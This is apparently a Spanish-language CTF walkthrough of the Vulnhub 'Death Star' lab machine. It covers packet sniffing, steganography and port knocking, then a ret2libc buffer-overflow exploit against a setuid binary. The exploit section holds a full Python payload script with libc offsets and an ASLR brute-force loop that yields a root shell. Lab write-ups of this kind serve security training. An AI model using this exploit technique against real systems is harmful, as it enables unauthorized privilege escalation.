LaCashita!

[VLN] DeathStar

Hoy vamos a hackear la maquina de Vulnhub llamada Death Star. Podeis descargarla desde el siguiente enlace: DeathStar

Video

Enumeration

En esta maquina nmap nos sirve de poco :) El primer paso es abrir Wireshark y filtramos por la ip de la maquina victima con el siguiente filtro:


ip.addr == 192.168.1.95

Con paciencia, veremos que recibimos 2 paquetes UDP que contienen la siguiente informacion:


Thanks to the successful Operation Skyhook, the Rebel Alliance
got some plans for the new weapon of the Galactic Empire. We
know that there is a small opening that we can explore through a
thermal exhaust that is directly connected to the Main Reactor of the
Death Star. The superlaser takes 1440 minutes to reload.
It is very important to observe 'this window' in order to recover the blueprint.
This is because, it is only possible to make an attempt every 60 seconds.

Y el otro paquete:


Code to access the Death Star Blueprint
within the time it takes to reload is:  DS-1@OBS

Leyendo, nos indica el codigo de acceso (DS-1@OBS) y por otro lado vemos el numero 1440... Asi que si probamos a enviar algo de informacion por UDP al puerto 1440, nos dira algo como "Wrong Code". Como tenemos el codigo, lo enviamos, y guardamos todos los datos recibidos en el fichero death.txt. Vemos que es base64, asi que hacemos decode y lo guardamos en death2, y por ultimo, usamos file para ver que se trata de una imagen...


sml@Cassandra:~$ echo -e "DS-1@OBS" | nc -u -w1 192.168.1.95 1440 > death.txt
sml@Cassandra:~$ cat death.txt | base64 -d > death2
sml@Cassandra:~$ file death2
death2: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, 
segment length 16, baseline, precision 8, 900x688, components 3
sml@Cassandra:~$ mv death2 death2.jpeg

Al abrir la imagen vemos que hay un "unlock code", pero no sabemos que hacer con el. Usamos steghide y usamos el codigo anterior "DS-1@OBS" para ver si podemos extraer algo de informacion.


sml@Cassandra:~$ steghide extract -sf death2.jpeg 
Anotar salvoconducto: 
anot los datos extraidos e/"openTheExhaust.txt".

Exploramos el fichero que hemos extraido.


sml@Cassandra:~$ cat openTheExhaust.txt 
Each segment of the "unlock code" can only contain 3 characters sent in 
sequence to unlock port 10110.

Debemos separar el unlock code en cifras de 3 numeros, y luego hacer port knocking para que se abra el puerto 10110. Nos descargamos un "knocker".


sml@Cassandra:~$ wget 
https://raw.githubusercontent.com/grongor/knock/master/knock -O knock.py
--2020-05-17 00:58:07--  
https://raw.githubusercontent.com/grongor/knock/master/knock
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 
151.101.132.133
Conectando con raw.githubusercontent.com 
(raw.githubusercontent.com)[151.101.132.133]:443... conectado.
PeticiÃġn HTTP enviada, esperando respuesta... 200 OK
Longitud: 2932 (2,9K) [text/plain]
Grabando a: âknock.pyâ

knock.py                                  
100%[===========================================================================
=======>]   2,86K  --.-KB/s    en 0s      

2020-05-17 00:58:07 (28,8 MB/s) - âknock.py guardado [2932/2932]

Ejecutamos:


sml@Cassandra:~$ python3 knock.py 192.168.1.95 197 719 801 983

Y probamos a conectar por ssh al puerto que nos indicaba.


sml@Cassandra:~$ ssh 192.168.1.95 -p 10110
                    
Devoloped by Galen Walton Erso
System's user: erso
Pass Hint: My wife's first name plus the year (BBY) she died.

Glory to the Empire - Project DS-1: Orbital Battle Station
sml@192.168.1.95's password:

En el banner vemos que el usuario del sistema es erso, y el password es el nombre de la mujer y el ano en que murio. Si buscamos en Intrenet veremos que la mujer se llamaba Lyra y murio 13(BBY) con lo cual la password es: lyra13 Nos logueamos con el usuario erso...

Low Shell


sml@Cassandra:~$ ssh erso@192.168.1.95 -p 10110
                                                                 
Devoloped by Galen Walton Erso
System's user: erso
Pass Hint: My wife's first name plus the year (BBY) she died.

Glory to the Empire - Project DS-1: Orbital Battle Station

erso@192.168.1.95's password
erso@deathStar1:~$

Ya estamos dentro :) Exploramos el sistema.


erso@deathStar1:~$ ls
warning.txt
erso@deathStar1:~$ cat warning.txt 

Message from GALEN ERSO:
This is your chance. Destroy the plans of the Galactic Empire. I know that Lord 
Vader 
will not like this at all. But, this will be my chance for redemption. 
I hope you have enough knowledge to help destroy this new weapon.
Explore the system and get 'root access' to read the secret message located at 
'/root/message.txt'. 
Hack or fail!!

Echamos un vistazo a ficheros con permisos "especiales".


erso@deathStar1:~$ find / -perm -4000 2>/dev/null
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/pkexec
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/su
/bin/ping6
/bin/fusermount
/bin/dartVader
/bin/umount
/bin/mount
/bin/ping

Vemos el fichero llamado /bin/dartVader.


erso@deathStar1:~$ /bin/dartVader
dartVader: Voce tem um futuro aqui. Nao seja um Lammer, busque e aprenda 
realmente...

Despues de hacer pruebas, el fichero es vulnerable a ret2lib... Nos lo descargamos en nuestra maquina.

Exploit


sml@Cassandra:~$ scp -P 10110 erso@192.168.1.95:/bin/dartVader .
                                                                   
Devoloped by Galen Walton Erso
System's user: erso
Pass Hint: My wife's first name plus the year (BBY) she died.

Glory to the Empire - Project DS-1: Orbital Battle Station

erso@192.168.1.95's password: 
dartVader                                                                       
     100% 7338     7.0MB/s   00:00

Arrancamos GDBPeda para ver cuando "peta"...


sml@Cassandra:~$ gdb -q dartVader
Reading symbols from dartVader...
(No debugging symbols found in dartVader)
gdb-peda$ pattern_create 250
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4
AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAA
qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA
%aA%0A%FA%b'
gdb-peda$ pset arg 
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4
AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAA
qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA
%aA%0A%FA%b'
gdb-peda$ run
Starting program: /home/sml/dartVader 
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4
AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAA
qAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA
%aA%0A%FA%b'

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1f0 
("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA
4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATA
AqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
EBX: 0x0 
ECX: 0xffffd560 --> 0x45485300 ('')
EDX: 0xffffd2ea --> 0xd5d2ff00 
ESI: 0xf7fb3000 --> 0x1dfd6c 
EDI: 0xf7fb3000 --> 0x1dfd6c 
EBP: 0x65414149 ('IAAe')
ESP: 0xffffd240 
("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATA
AqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%E
A%aA%0A%FA%b")
EIP: 0x41344141 ('AA4A')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction 
overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41344141
[------------------------------------stack-------------------------------------]
0000| 0xffffd240 
("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATA
AqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%E
A%aA%0A%FA%b")
0004| 0xffffd244 
("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAA
UAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA
%0A%FA%b")
0008| 0xffffd248 
("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAAr
AAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%
FA%b")
0012| 0xffffd24c 
("AgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVA
AtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b
")
0016| 0xffffd250 
("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAA
WAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0020| 0xffffd254 
("AAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAu
AAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0024| 0xffffd258 
("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXA
AvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
0028| 0xffffd25c 
("MAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAA
YAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%b")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41344141 in ?? ()
gdb-peda$ pattern_offset 0x41344141
1093943617 found at offset: 76

Bien, vemos que es 76. Ahora en la maquina deathStar, miramos la direccion de libc.


erso@deathStar1:~$ ldd /bin/dartVader 
        linux-gate.so.1 =>  (0xb7776000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ba000)
        /lib/ld-linux.so.2 (0xb7778000)

La direccion de system...


erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
   243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

Direccion de exit...


erso@deathStar1:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
   111: 00033690    58 FUNC    GLOBAL DEFAULT   12 
__cxa_at_quick_exit@@GLIBC_2.10
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.0
   446: 000336d0   268 FUNC    GLOBAL DEFAULT   12 
__cxa_thread_atexit_impl@@GLIBC_2.18
   554: 000b8634    24 FUNC    GLOBAL DEFAULT   12 _exit@@GLIBC_2.0
   609: 0011e780    56 FUNC    GLOBAL DEFAULT   12 svc_exit@@GLIBC_2.0
   645: 00033660    45 FUNC    GLOBAL DEFAULT   12 quick_exit@@GLIBC_2.10
   868: 00033490    84 FUNC    GLOBAL DEFAULT   12 __cxa_atexit@@GLIBC_2.1.3
  1037: 00128ce0    60 FUNC    GLOBAL DEFAULT   12 atexit@GLIBC_2.0
  1380: 001ad204     4 OBJECT  GLOBAL DEFAULT   31 
argp_err_exit_status@@GLIBC_2.1
  1492: 000fb610    62 FUNC    GLOBAL DEFAULT   12 pthread_exit@@GLIBC_2.0
  2090: 001ad154     4 OBJECT  GLOBAL DEFAULT   31 
obstack_exit_failure@@GLIBC_2.0
  2243: 00033290    77 FUNC    WEAK   DEFAULT   12 on_exit@@GLIBC_2.0
  2386: 000fc180     2 FUNC    GLOBAL DEFAULT   12 
__cyg_profile_func_exit@@GLIBC_2.2

Y por ultimo, direccion de "bin/sh"...


erso@deathStar1:~$ strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 162d4c /bin/sh

Teniendo estos datos, montamos nuestro exploit quedando de la siguiente manera:


erso@deathStar1:~$ cat ret.py 
import struct

def le(addr):
        return struct.pack("I",addr)

junk = "A"*76
libcbase = 0xb75a5000
libcsystem = le(libcbase + 0x00040310)
libcexit = le(libcbase + 0x00033260)
libcsh = le(libcbase + 0x00162d4c)
print junk + libcsystem + libcexit + libcsh

Como ASLR esta activado, si ejecutamos el exploit una sola vez probablemente no funcione, asi que hacemos un bucle "while" para que se ejecute hasta que funcione.

Privilege Escalation


erso@deathStar1:~$ while true;do /bin/dartVader $(python ret.py);done
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(erso) gid=1000(erso) euid=0(root) groups=0(root),1000(erso)

Y ya seriamos root!

root.txt


# cd /root
# ls
message.txt
# cat mess
cat: mess: No such file or directory
# cat message.txt
Art by Shanaka Dias
                    .==.
                   ()''()-.
        .---.       ;--; /
      .'_:___". _..'.  __'.
      |__ --==|'-''' \'...;
      [  ]  :[|       |---\
      |__| I=[|     .'    '.
      / / ____|     :       '._
     |-/.____.'      | :       :
snd /___\ /___\      '-'._----'

-------------------------------------

Congratulations!!
You helped me destroy the empire's weapon.

-------------------------------------
If you had fun, love to get your feedback.
Send me a tweet @mrhenrike  ;)

Until the next VM and "May the force be with you".

End

Y con esto ya seriamos root de la maquina :)